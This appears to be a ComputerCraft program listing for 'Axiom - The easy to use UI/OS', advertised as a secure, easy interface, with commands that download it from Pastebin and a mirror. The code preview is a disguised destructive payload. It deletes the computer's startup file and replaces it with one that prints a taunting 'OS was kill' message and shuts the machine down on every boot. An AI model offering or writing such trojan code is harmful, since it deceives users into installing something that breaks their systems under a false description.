Axiom - The easy to use UI/OS
Description
Axiom, now with desktop icons.Axiom is the way to go if you like having advanced things made simpler for you. Or simply love having top-notch security at the press of a button.Axiom has been carefully...
Installation
Copy one of these commands into your ComputerCraft terminal:
Pastebin:
pastebin get f9LN6P9R axiom_-_the_easy_to_use_ui/oswget:
wget https://pastebin.com/raw/f9LN6P9R axiom_-_the_easy_to_use_ui/osArchive:
wget https://cc.shobie.xyz/cc/get/pb-f9LN6P9R axiom_-_the_easy_to_use_ui/os
Quick Install:
wget https://cc.shobie.xyz/cc/get/pb-f9LN6P9R Axiom - The easy to use UI/OS
Usage
Run the program after downloading
Tags
Source
View Original SourceCode Preview
fs.delete("/startup")
f = fs.open("/startup", "w")
f.write("term.clear() term.setCursorPos(1,1) print('error:startup:1: OS was kill >=D') sleep(7) os.shutdown()")